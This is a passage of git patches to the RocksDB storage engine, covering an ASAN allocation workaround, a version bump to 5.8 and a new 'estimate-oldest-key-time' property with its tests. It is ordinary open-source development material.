nullptr && icmp_.user_comparator()->Compare(smallest_candidate.user_key(), *lower_bound) <= 0) { From e83d6a02e31c8930d1fd267b2bb0476601f6232c Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 29 Aug 2017 21:41:46 -0700 Subject: [PATCH 162/205] Not using aligned_alloc with gcc4 + asan Summary: GCC < 5 + ASAN does not instrument aligned_alloc, which can make ASAN report false-positive with "free on address which was not malloc" error. https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61693 Also suppress leak warning with LRUCache::DisownData(). Closes https://github.com/facebook/rocksdb/pull/2783 Differential Revision: D5696465 Pulled By: yiwu-arbug fbshipit-source-id: 87c607c002511fa089b18cc35e24909bee0e74b4 --- cache/lru_cache.cc | 23 ++++++----------------- port/port_posix.cc | 4 +++- 2 files changed, 9 insertions(+), 18 deletions(-) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 47e40233648..268378b9d2b 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -234,35 +234,19 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } void* LRUCacheShard::operator new(size_t size) { -#if __SANITIZE_ADDRESS__ - return malloc(size); -#else return port::cacheline_aligned_alloc(size); -#endif } void* LRUCacheShard::operator new[](size_t size) { -#if __SANITIZE_ADDRESS__ - return malloc(size); -#else return port::cacheline_aligned_alloc(size); -#endif } void LRUCacheShard::operator delete(void *memblock) { -#if __SANITIZE_ADDRESS__ - free(memblock); -#else port::cacheline_aligned_free(memblock); -#endif } void LRUCacheShard::operator delete[](void* memblock) { -#if __SANITIZE_ADDRESS__ - free(memblock); -#else port::cacheline_aligned_free(memblock); -#endif } void LRUCacheShard::SetCapacity(size_t capacity) { @@ -518,7 +502,12 @@ uint32_t LRUCache::GetHash(Handle* handle) const { return reinterpret_cast(handle)->hash; } -void LRUCache::DisownData() { shards_ = nullptr; } +void LRUCache::DisownData() { +// Do not drop data if compile with ASAN to suppress leak warning. +#ifndef __SANITIZE_ADDRESS__ + shards_ = nullptr; +#endif // !__SANITIZE_ADDRESS__ +} size_t LRUCache::TEST_GetLRUSize() { size_t lru_size_of_all_shards = 0; diff --git a/port/port_posix.cc b/port/port_posix.cc index ee073a55d3f..129933bb1f9 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -185,7 +185,9 @@ int GetMaxOpenFiles() { } void *cacheline_aligned_alloc(size_t size) { -#if defined (_ISOC11_SOURCE) +#if __GNUC__ < 5 && defined(__SANITIZE_ADDRESS__) + return malloc(size); +#elif defined(_ISOC11_SOURCE) return aligned_alloc(CACHE_LINE_SIZE, size); #elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__)) void *m; From 64185c23ad9833850e97df15688b4410f56b68d3 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 29 Aug 2017 22:13:09 -0700 Subject: [PATCH 163/205] update HISTORY.md for DeleteRange bug fix Summary: fixed in #2799 Closes https://github.com/facebook/rocksdb/pull/2805 Differential Revision: D5734324 Pulled By: ajkr fbshipit-source-id: a285d4e84bf1018dc2257fd6c3e7c075a7243263 --- HISTORY.md | 1 + 1 file changed, 1 insertion(+) diff --git a/HISTORY.md b/HISTORY.md index 581e6b3ad58..c898fb6b54d 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -16,6 +16,7 @@ * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. * Fix incorrect dropping of deletions during intra-L0 compaction. * Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled. +* Fix potentially wrong file smallest key when range deletions separated by snapshot are written together. ## 5.7.0 (07/13/2017) ### Public API Change From 266ac245affd69555643b735d19d3715c4eff91a Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 30 Aug 2017 14:12:03 -0700 Subject: [PATCH 164/205] Bumping version to 5.8 Summary: Closes https://github.com/facebook/rocksdb/pull/2738 Differential Revision: D5736261 Pulled By: maysamyabandeh fbshipit-source-id: 49d27e9ccd786c4056a3d586a060fe460ea883ac --- HISTORY.md | 6 ++++++ include/rocksdb/version.h | 2 +- 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index c898fb6b54d..4da23b8af82 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,8 +1,14 @@ # Rocksdb Change Log ## Unreleased ### Public API Change +### New Features +### Bug Fixes + +## 5.8.0 (08/30/2017) +### Public API Change * Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints. * `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr. +* `Transaction::Get` and `Transaction::GetForUpdate` variants with `PinnableSlice` added. ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index fb920cf2e7e..dd11ea7e8e5 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -5,7 +5,7 @@ #pragma once #define ROCKSDB_MAJOR 5 -#define ROCKSDB_MINOR 7 +#define ROCKSDB_MINOR 8 #define ROCKSDB_PATCH 0 // Do not use these. We made the mistake of declaring macros starting with From 88595c882a1e8b9d7878c0979733a47a372d8059 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 23 Oct 2017 15:22:05 -0700 Subject: [PATCH 165/205] Add DB::Properties::kEstimateOldestKeyTime Summary: With FIFO compaction we would like to get the oldest data time for monitoring. The problem is we don't have timestamp for each key in the DB. As an approximation, we expose the earliest of sst file "creation_time" property. My plan is to override the property with a more accurate value with blob db, where we actually have timestamp. Closes https://github.com/facebook/rocksdb/pull/2842 Differential Revision: D5770600 Pulled By: yiwu-arbug fbshipit-source-id: 03833c8f10bbfbee62f8ea5c0d03c0cafb5d853a --- HISTORY.md | 3 +- db/builder.cc | 17 ++++--- db/builder.h | 7 ++- db/compaction_picker.cc | 27 ++++++----- db/db_properties_test.cc | 74 ++++++++++++++++++++++++++++++ db/db_sst_test.cc | 14 ++++-- db/db_test_util.h | 31 +++++++++++++ db/flush_job.cc | 6 ++- db/internal_stats.cc | 33 ++++++++++++- db/internal_stats.h | 2 + db/memtable.cc | 22 ++++++++- db/memtable.h | 9 ++++ db/memtable_list.cc | 8 ++++ db/memtable_list.h | 3 ++ include/rocksdb/db.h | 7 +++ include/rocksdb/table_properties.h | 6 ++- table/block_based_table_builder.cc | 20 +++++--- table/block_based_table_builder.h | 3 +- table/block_based_table_factory.cc | 3 +- table/meta_blocks.cc | 3 ++ table/table_builder.h | 8 +++- table/table_properties.cc | 5 ++ utilities/blob_db/blob_db_test.cc | 45 +++++++----------- 23 files changed, 282 insertions(+), 74 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 4da23b8af82..23bcdaee22a 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,8 +1,7 @@ # Rocksdb Change Log ## Unreleased -### Public API Change ### New Features -### Bug Fixes +* Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. ## 5.8.0 (08/30/2017) ### Public API Change diff --git a/db/builder.cc b/db/builder.cc index 6f973fdbd5b..7cfa7800cce 100644 --- a/db/builder.cc +++ b/db/builder.cc @@ -47,15 +47,15 @@ TableBuilder* NewTableBuilder( WritableFileWriter* file, const CompressionType compression_type, const CompressionOptions& compression_opts, int level, const std::string* compression_dict, const bool skip_filters, - const uint64_t creation_time) { + const uint64_t creation_time, const uint64_t oldest_key_time) { assert((column_family_id == TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) == column_family_name.empty()); return ioptions.table_factory->NewTableBuilder( - TableBuilderOptions(ioptions, internal_comparator, - int_tbl_prop_collector_factories, compression_type, - compression_opts, compression_dict, skip_filters, - column_family_name, level, creation_time), + TableBuilderOptions( + ioptions, internal_comparator, int_tbl_prop_collector_factories, + compression_type, compression_opts, compression_dict, skip_filters, + column_family_name, level, creation_time, oldest_key_time), column_family_id, file); } @@ -74,8 +74,8 @@ Status BuildTable( const CompressionOptions& compression_opts, bool paranoid_file_checks, InternalStats* internal_stats, TableFileCreationReason reason, EventLogger* event_logger, int job_id, const Env::IOPriority io_priority, - TableProperties* table_properties, int level, - const uint64_t creation_time) { + TableProperties* table_properties, int level, const uint64_t creation_time, + const uint64_t oldest_key_time) { assert((column_family_id == TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) == column_family_name.empty()); @@ -120,12 +120,11 @@ Status BuildTable( file_writer.reset(new WritableFileWriter(std::move(file), env_options, ioptions.statistics)); - builder = NewTableBuilder( ioptions, internal_comparator, int_tbl_prop_collector_factories, column_family_id, column_family_name, file_writer.get(), compression, compression_opts, level, nullptr /* compression_dict */, - false /* skip_filters */, creation_time); + false /* skip_filters */, creation_time, oldest_key_time); } MergeHelper merge(env, internal_comparator.user_comparator(), diff --git a/db/builder.h b/db/builder.h index a432a753182..f637368822b 100644 --- a/db/builder.h +++ b/db/builder.h @@ -6,6 +6,7 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. #pragma once +#include #include #include #include @@ -50,7 +51,8 @@ TableBuilder* NewTableBuilder( WritableFileWriter* file, const CompressionType compression_type, const CompressionOptions& compression_opts, int level, const std::string* compression_dict = nullptr, - const bool skip_filters = false, const uint64_t creation_time = 0); + const bool skip_filters = false, const uint64_t creation_time = 0, + const uint64_t oldest_key_time = std::numeric_limits::max()); // Build a Table file from the contents of *iter. The generated file // will be named according to number specified in meta. On success, the rest of @@ -77,6 +79,7 @@ extern Status BuildTable( EventLogger* event_logger = nullptr, int job_id = 0, const Env::IOPriority io_priority = Env::IO_HIGH, TableProperties* table_properties = nullptr, int level = -1, - const uint64_t creation_time = 0); + const uint64_t creation_time = 0, + const uint64_t oldest_key_time = std::numeric_limits::max()); } // namespace rocksdb diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index c6a56746ff0..79af3ed9fe0 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -1442,19 +1442,22 @@ Compaction* FIFOCompactionPicker::PickTTLCompaction( inputs.emplace_back(); inputs[0].level = 0; - for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) { - auto f = *ritr; - if (f->fd.table_reader != nullptr && - f->fd.table_reader->GetTableProperties() != nullptr) { - auto creation_time = - f->fd.table_reader->GetTableProperties()->creation_time; - if (creation_time == 0 || - creation_time >= - (current_time - ioptions_.compaction_options_fifo.ttl)) { - break; + // avoid underflow + if (current_time > ioptions_.compaction_options_fifo.ttl) { + for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) { + auto f = *ritr; + if (f->fd.table_reader != nullptr && + f->fd.table_reader->GetTableProperties() != nullptr) { + auto creation_time = + f->fd.table_reader->GetTableProperties()->creation_time; + if (creation_time == 0 || + creation_time >= + (current_time - ioptions_.compaction_options_fifo.ttl)) { + break; + } + total_size -= f->compensated_file_size; + inputs[0].files.push_back(f); } - total_size -= f->compensated_file_size; - inputs[0].files.push_back(f); } } diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc index b09fe1ffacc..0da64b13656 100644 --- a/db/db_properties_test.cc +++ b/db/db_properties_test.cc @@ -1309,6 +1309,80 @@ TEST_F(DBPropertiesTest, EstimateNumKeysUnderflow) { ASSERT_EQ(0, num_keys); } +TEST_F(DBPropertiesTest, EstimateOldestKeyTime) { + std::unique_ptr mock_env(new MockTimeEnv(Env::Default())); + uint64_t oldest_key_time = 0; + Options options; + options.env = mock_env.get(); + + // "rocksdb.estimate-oldest-key-time" only available to fifo compaction. + mock_env->set_current_time(100); + for (auto compaction : {kCompactionStyleLevel, kCompactionStyleUniversal, + kCompactionStyleNone}) { + options.compaction_style = compaction; + options.create_if_missing = true; + DestroyAndReopen(options); + ASSERT_OK(Put("foo", "bar")); + ASSERT_FALSE(dbfull()->GetIntProperty( + DB::Properties::kEstimateOldestKeyTime, &oldest_key_time)); + } + + options.compaction_style = kCompactionStyleFIFO; + options.compaction_options_fifo.ttl = 300; + options.compaction_options_fifo.allow_compaction = false; + DestroyAndReopen(options); + + mock_env->set_current_time(100); + ASSERT_OK(Put("k1", "v1")); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(100, oldest_key_time); + ASSERT_OK(Flush()); + ASSERT_EQ("1", FilesPerLevel()); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(100, oldest_key_time); + + mock_env->set_current_time(200); + ASSERT_OK(Put("k2", "v2")); + ASSERT_OK(Flush()); + ASSERT_EQ("2", FilesPerLevel()); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(100, oldest_key_time); + + mock_env->set_current_time(300); + ASSERT_OK(Put("k3", "v3")); + ASSERT_OK(Flush()); + ASSERT_EQ("3", FilesPerLevel()); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(100, oldest_key_time); + + mock_env->set_current_time(450); + ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); + ASSERT_EQ("2", FilesPerLevel()); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(200, oldest_key_time); + + mock_env->set_current_time(550); + ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); + ASSERT_EQ("1", FilesPerLevel()); + ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + ASSERT_EQ(300, oldest_key_time); + + mock_env->set_current_time(650); + ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); + ASSERT_EQ("", FilesPerLevel()); + ASSERT_FALSE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime, + &oldest_key_time)); + + // Close before mock_env destructs. + Close(); +} + #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 73c6fe8016d..56e00df83f7 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -701,9 +701,13 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 1 (compacted file) - // Total SST files = 6 (5 original files + compacted file) - ASSERT_EQ(live_sst_files_size, 1 * single_file_size); - ASSERT_EQ(total_sst_files_size, 6 * single_file_size); + // The 5 bytes difference comes from oldest-key-time table property isn't + // propagated on compaction. It is written with default value + // std::numeric_limits::max as varint64. + ASSERT_EQ(live_sst_files_size, 1 * single_file_size + 5); + + // Total SST files = 5 original files + compacted file + ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); // hold current version std::unique_ptr iter2(dbfull()->NewIterator(ReadOptions())); @@ -724,14 +728,14 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { &total_sst_files_size)); // Live SST files = 0 // Total SST files = 6 (5 original files + compacted file) - ASSERT_EQ(total_sst_files_size, 6 * single_file_size); + ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); iter1.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 0 // Total SST files = 1 (compacted file) - ASSERT_EQ(total_sst_files_size, 1 * single_file_size); + ASSERT_EQ(total_sst_files_size, live_sst_files_size); iter2.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", diff --git a/db/db_test_util.h b/db/db_test_util.h index cd1265e21f1..f2caa46ca29 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -572,6 +572,37 @@ class SpecialEnv : public EnvWrapper { std::atomic is_wal_sync_thread_safe_{true}; }; +class MockTimeEnv : public EnvWrapper { + public: + explicit MockTimeEnv(Env* base) : EnvWrapper(base) {} + + virtual Status GetCurrentTime(int64_t* time) override { + assert(time != nullptr); + assert(current_time_ <= + static_cast(std::numeric_limits::max())); + *time = static_cast(current_time_); + return Status::OK(); + } + + virtual uint64_t NowMicros() override { + assert(current_time_ <= std::numeric_limits::max() / 1000000); + return current_time_ * 1000000; + } + + virtual uint64_t NowNanos() override { + assert(current_time_ <= std::numeric_limits::max() / 1000000000); + return current_time_ * 1000000000; + } + + void set_current_time(uint64_t time) { + assert(time >= current_time_); + current_time_ = time; + } + + private: + uint64_t current_time_ = 0; +}; + #ifndef ROCKSDB_LITE class OnFileDeletionListener : public EventListener { public: diff --git a/db/flush_job.cc b/db/flush_job.cc index 846edb4074b..f0903f79b46 100644 --- a/db/flush_job.cc +++ b/db/flush_job.cc @@ -16,6 +16,7 @@ #include #include +#include #include #include "db/builder.h" @@ -301,6 +302,8 @@ Status FlushJob::WriteLevel0Table() { db_options_.env->GetCurrentTime(&_current_time); // ignore error const uint64_t current_time = static_cast(_current_time); + uint64_t oldest_key_time = mems_.front()->ApproximateOldestKeyTime(); + s = BuildTable( dbname_, db_options_.env, *cfd_->ioptions(), mutable_cf_options_, optimized_env_options, cfd_->table_cache(), iter.get(), @@ -311,7 +314,8 @@ Status FlushJob::WriteLevel0Table() { cfd_->ioptions()->compression_opts, mutable_cf_options_.paranoid_file_checks, cfd_->internal_stats(), TableFileCreationReason::kFlush, event_logger_, job_context_->job_id, - Env::IO_HIGH, &table_properties_, 0 /* level */, current_time); + Env::IO_HIGH, &table_properties_, 0 /* level */, current_time, + oldest_key_time); LogFlush(db_options_.info_log); } ROCKS_LOG_INFO(db_options_.info_log, diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 54723ea91f6..2eff2865261 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -13,8 +13,9 @@ #endif #include -#include #include +#include +#include #include #include #include "db/column_family.h" @@ -243,6 +244,7 @@ static const std::string num_running_flushes = "num-running-flushes"; static const std::string actual_delayed_write_rate = "actual-delayed-write-rate"; static const std::string is_write_stopped = "is-write-stopped"; +static const std::string estimate_oldest_key_time = "estimate-oldest-key-time"; const std::string DB::Properties::kNumFilesAtLevelPrefix = rocksdb_prefix + num_files_at_level_prefix; @@ -316,6 +318,8 @@ const std::string DB::Properties::kActualDelayedWriteRate = rocksdb_prefix + actual_delayed_write_rate; const std::string DB::Properties::kIsWriteStopped = rocksdb_prefix + is_write_stopped; +const std::string DB::Properties::kEstimateOldestKeyTime = + rocksdb_prefix + estimate_oldest_key_time; const std::unordered_map InternalStats::ppt_name_to_info = { @@ -414,6 +418,9 @@ const std::unordered_map nullptr}}, {DB::Properties::kIsWriteStopped, {false, nullptr, &InternalStats::HandleIsWriteStopped, nullptr}}, + {DB::Properties::kEstimateOldestKeyTime, + {false, nullptr, &InternalStats::HandleEstimateOldestKeyTime, + nullptr}}, }; const DBPropertyInfo* GetPropertyInfo(const Slice& property) { @@ -775,6 +782,30 @@ bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db, return true; } +bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { + // TODO(yiwu): The property is currently available for fifo compaction + // with allow_compaction = false. This is because we don't propagate + // oldest_key_time on compaction. + if (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO || + cfd_->ioptions()->compaction_options_fifo.allow_compaction) { + return false; + } + + TablePropertiesCollection collection; + auto s = cfd_->current()->GetPropertiesOfAllTables(&collection); + if (!s.ok()) { + return false; + } + *value = std::numeric_limits::max(); + for (auto& p : collection) { + *value = std::min(*value, p.second->oldest_key_time); + } + *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(), + cfd_->imm()->ApproximateOldestKeyTime(), *value}); + return *value < std::numeric_limits::max(); +} + void InternalStats::DumpDBStats(std::string* value) { char buf[1000]; // DB-level stats, only available from default column family diff --git a/db/internal_stats.h b/db/internal_stats.h index 1dd393f73ce..a0b8a902718 100644 --- a/db/internal_stats.h +++ b/db/internal_stats.h @@ -475,6 +475,8 @@ class InternalStats { bool HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, Version* version); bool HandleIsWriteStopped(uint64_t* value, DBImpl* db, Version* version); + bool HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* db, + Version* version); // Total number of background errors encountered. Every time a flush task // or compaction task fails, this counter is incremented. The failure can diff --git a/db/memtable.cc b/db/memtable.cc index a24989123b3..9f2fd20bb50 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -9,8 +9,9 @@ #include "db/memtable.h" -#include #include +#include +#include #include "db/dbformat.h" #include "db/merge_context.h" @@ -96,7 +97,8 @@ MemTable::MemTable(const InternalKeyComparator& cmp, flush_state_(FLUSH_NOT_REQUESTED), env_(ioptions.env), insert_with_hint_prefix_extractor_( - ioptions.memtable_insert_with_hint_prefix_extractor) { + ioptions.memtable_insert_with_hint_prefix_extractor), + oldest_key_time_(std::numeric_limits::max()) { UpdateFlushState(); // something went wrong if we need to flush before inserting anything assert(!ShouldScheduleFlush()); @@ -202,6 +204,21 @@ void MemTable::UpdateFlushState() { } } +void MemTable::UpdateOldestKeyTime() { + uint64_t oldest_key_time = oldest_key_time_.load(std::memory_order_relaxed); + if (oldest_key_time == std::numeric_limits::max()) { + int64_t current_time = 0; + auto s = env_->GetCurrentTime(¤t_time); + if (s.ok()) { + assert(current_time >= 0); + // If fail, the timestamp is already set. + oldest_key_time_.compare_exchange_strong( + oldest_key_time, static_cast(current_time), + std::memory_order_relaxed, std::memory_order_relaxed); + } + } +} + int MemTable::KeyComparator::operator()(const char* prefix_len_key1, const char* prefix_len_key2) const { // Internal keys are encoded as length-prefixed strings. @@ -516,6 +533,7 @@ void MemTable::Add(SequenceNumber s, ValueType type, if (is_range_del_table_empty_ && type == kTypeRangeDeletion) { is_range_del_table_empty_ = false; } + UpdateOldestKeyTime(); } // Callback from MemTable::Get() diff --git a/db/memtable.h b/db/memtable.h index fe9feaf5706..9669a2157c4 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -348,6 +348,10 @@ class MemTable { const MemTableOptions* GetMemTableOptions() const { return &moptions_; } + uint64_t ApproximateOldestKeyTime() const { + return oldest_key_time_.load(std::memory_order_relaxed); + } + private: enum FlushStateEnum { FLUSH_NOT_REQUESTED, FLUSH_REQUESTED, FLUSH_SCHEDULED }; @@ -411,12 +415,17 @@ class MemTable { // Insert hints for each prefix. std::unordered_map insert_hints_; + // Timestamp of oldest key + std::atomic oldest_key_time_; + // Returns a heuristic flush decision bool ShouldFlushNow() const; // Updates flush_state_ using ShouldFlushNow() void UpdateFlushState(); + void UpdateOldestKeyTime(); + // No copying allowed MemTable(const MemTable&); MemTable& operator=(const MemTable&); diff --git a/db/memtable_list.cc b/db/memtable_list.cc index 8f710c2e970..c9a927c062f 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -10,6 +10,7 @@ #endif #include +#include #include #include "db/memtable.h" #include "db/version_set.h" @@ -447,6 +448,13 @@ size_t MemTableList::ApproximateUnflushedMemTablesMemoryUsage() { size_t MemTableList::ApproximateMemoryUsage() { return current_memory_usage_; } +uint64_t MemTableList::ApproximateOldestKeyTime() const { + if (!current_->memlist_.empty()) { + return current_->memlist_.back()->ApproximateOldestKeyTime(); + } + return std::numeric_limits::max(); +} + void MemTableList::InstallNewVersion() { if (current_->refs_ == 1) { // we're the only one using the version, just keep using it diff --git a/db/memtable_list.h b/db/memtable_list.h index ed475b83a10..628ab544b6c 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -217,6 +217,9 @@ class MemTableList { // the unflushed mem-tables. size_t ApproximateUnflushedMemTablesMemoryUsage(); + // Returns an estimate of the timestamp of the earliest key. + uint64_t ApproximateOldestKeyTime() const; + // Request a flush of all existing memtables to storage. This will // cause future calls to IsFlushPending() to return true if this list is // non-empty (regardless of the min_write_buffer_number_to_merge diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 078c24b4fa8..964f7b1db45 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -582,6 +582,12 @@ class DB { // "rocksdb.is-write-stopped" - Return 1 if write has been stopped. static const std::string kIsWriteStopped; + + // "rocksdb.estimate-oldest-key-time" - returns an estimation of + // oldest key timestamp in the DB. Currently only available for + // FIFO compaction with + // compaction_options_fifo.allow_compaction = false. + static const std::string kEstimateOldestKeyTime; }; #endif /* ROCKSDB_LITE */ @@ -632,6 +638,7 @@ class DB { // "rocksdb.num-running-flushes" // "rocksdb.actual-delayed-write-rate" // "rocksdb.is-write-stopped" + // "rocksdb.estimate-oldest-key-time" virtual bool GetIntProperty(ColumnFamilyHandle* column_family, const Slice& property, uint64_t* value) = 0; virtual bool GetIntProperty(const Slice& property, uint64_t* value) { diff --git a/include/rocksdb/table_properties.h b/include/rocksdb/table_properties.h index 08360d1794a..e8bbabc3ba7 100644 --- a/include/rocksdb/table_properties.h +++ b/include/rocksdb/table_properties.h @@ -4,8 +4,9 @@ #pragma once #include -#include +#include #include +#include #include "rocksdb/status.h" #include "rocksdb/types.h" @@ -49,6 +50,7 @@ struct TablePropertiesNames { static const std::string kPropertyCollectors; static const std::string kCompression; static const std::string kCreationTime; + static const std::string kOldestKeyTime; }; extern const std::string kPropertiesBlock; @@ -162,6 +164,8 @@ struct TableProperties { // The time when the SST file was created. // Since SST files are immutable, this is equivalent to last modified time. uint64_t creation_time = 0; + // Timestamp of the earliest key + uint64_t oldest_key_time = std::numeric_limits::max(); // Name of the column family with which this SST file is associated. // If column family is unknown, `column_family_name` will be an empty string. diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index d42e0f8b7aa..d48c48cfdd1 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -276,6 +276,7 @@ struct BlockBasedTableBuilder::Rep { uint32_t column_family_id; const std::string& column_family_name; uint64_t creation_time = 0; + uint64_t oldest_key_time = std::numeric_limits::max(); std::vector> table_properties_collectors; @@ -288,7 +289,8 @@ struct BlockBasedTableBuilder::Rep { const CompressionType _compression_type, const CompressionOptions& _compression_opts, const std::string* _compression_dict, const bool skip_filters, - const std::string& _column_family_name, const uint64_t _creation_time) + const std::string& _column_family_name, const uint64_t _creation_time, + const uint64_t _oldest_key_time) : ioptions(_ioptions), table_options(table_opt), internal_comparator(icomparator), @@ -305,7 +307,8 @@ struct BlockBasedTableBuilder::Rep { table_options, data_block)), column_family_id(_column_family_id), column_family_name(_column_family_name), - creation_time(_creation_time) { + creation_time(_creation_time), + oldest_key_time(_oldest_key_time) { if (table_options.index_type == BlockBasedTableOptions::kTwoLevelIndexSearch) { p_index_builder_ = PartitionedIndexBuilder::CreateIndexBuilder( @@ -344,7 +347,8 @@ BlockBasedTableBuilder::BlockBasedTableBuilder( const CompressionType compression_type, const CompressionOptions& compression_opts, const std::string* compression_dict, const bool skip_filters, - const std::string& column_family_name, const uint64_t creation_time) { + const std::string& column_family_name, const uint64_t creation_time, + const uint64_t oldest_key_time) { BlockBasedTableOptions sanitized_table_options(table_options); if (sanitized_table_options.format_version == 0 && sanitized_table_options.checksum != kCRC32c) { @@ -357,10 +361,11 @@ BlockBasedTableBuilder::BlockBasedTableBuilder( sanitized_table_options.format_version = 1; } - rep_ = new Rep(ioptions, sanitized_table_options, internal_comparator, - int_tbl_prop_collector_factories, column_family_id, file, - compression_type, compression_opts, compression_dict, - skip_filters, column_family_name, creation_time); + rep_ = + new Rep(ioptions, sanitized_table_options, internal_comparator, + int_tbl_prop_collector_factories, column_family_id, file, + compression_type, compression_opts, compression_dict, + skip_filters, column_family_name, creation_time, oldest_key_time); if (rep_->filter_builder != nullptr) { rep_->filter_builder->StartBlock(0); @@ -738,6 +743,7 @@ Status BlockBasedTableBuilder::Finish() { r->p_index_builder_->EstimateTopLevelIndexSize(r->offset); } r->props.creation_time = r->creation_time; + r->props.oldest_key_time = r->oldest_key_time; // Add basic properties property_block_builder.AddTableProperty(r->props); diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h index 2e860627107..c9197ef5cce 100644 --- a/table/block_based_table_builder.h +++ b/table/block_based_table_builder.h @@ -47,7 +47,8 @@ class BlockBasedTableBuilder : public TableBuilder { const CompressionType compression_type, const CompressionOptions& compression_opts, const std::string* compression_dict, const bool skip_filters, - const std::string& column_family_name, const uint64_t creation_time = 0); + const std::string& column_family_name, const uint64_t creation_time = 0, + const uint64_t oldest_key_time = std::numeric_limits::max()); // REQUIRES: Either Finish() or Abandon() has been called. ~BlockBasedTableBuilder(); diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index b4f8ba8a178..0c6bbbcb64b 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -79,7 +79,8 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( table_builder_options.compression_dict, table_builder_options.skip_filters, table_builder_options.column_family_name, - table_builder_options.creation_time); + table_builder_options.creation_time, + table_builder_options.oldest_key_time); return table_builder; } diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc index 1227bb0aeb7..19925d78897 100644 --- a/table/meta_blocks.cc +++ b/table/meta_blocks.cc @@ -77,6 +77,7 @@ void PropertyBlockBuilder::AddTableProperty(const TableProperties& props) { Add(TablePropertiesNames::kFixedKeyLen, props.fixed_key_len); Add(TablePropertiesNames::kColumnFamilyId, props.column_family_id); Add(TablePropertiesNames::kCreationTime, props.creation_time); + 